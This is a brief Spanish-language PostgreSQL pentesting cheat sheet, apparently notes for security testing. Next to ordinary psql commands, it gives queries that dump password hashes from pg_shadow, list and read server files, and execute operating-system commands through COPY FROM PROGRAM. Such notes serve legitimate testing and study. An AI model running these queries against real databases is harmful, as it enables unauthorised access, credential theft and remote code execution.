psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
Comandos Comunes
postgres=# \list // listar todas las bases de datos
postgres=# \c // seleccionar una base de datos
postgres=# \c <DATABASE> // seleccionar una base de datos especifica
postgres=# \s // historial de comandos
postgres=# \q // salir
<DATABASE>=# \dt // listar las tablas del schema actual
<DATABASE>=# \dt *.* // listar las tablas de todos los schema
<DATABASE>=# \du // listar los roles de usuario
<DATABASE>=# \du+ // listar los roles de usuario
<DATABASE>=# SELECT user; // mostar el usuario actual
<DATABASE>=# TABLE <TABLE>; // seleccionar una tabla
<DATABASE>=# SELECT usename, passwd from pg_shadow; // Leer credenciales
<DATABASE>=# SELECT * FROM pg_ls_dir('/'); // Leer directorios
<DATABASE>=# SELECT pg_read_file('/PATH/TO/FILE/<FILE>', 0, 1000000); // Leer un archivo
Ejecución Remota de Código
<DATABASE>=# DROP TABLE IF EXISTS cmd_exec;
<DATABASE>=# CREATE TABLE cmd_exec(cmd_output text);
<DATABASE>=# COPY cmd_exec FROM PROGRAM 'id';
<DATABASE>=# SELECT * FROM cmd_exec;
<DATABASE>=# DROP TABLE IF EXISTS cmd_exec;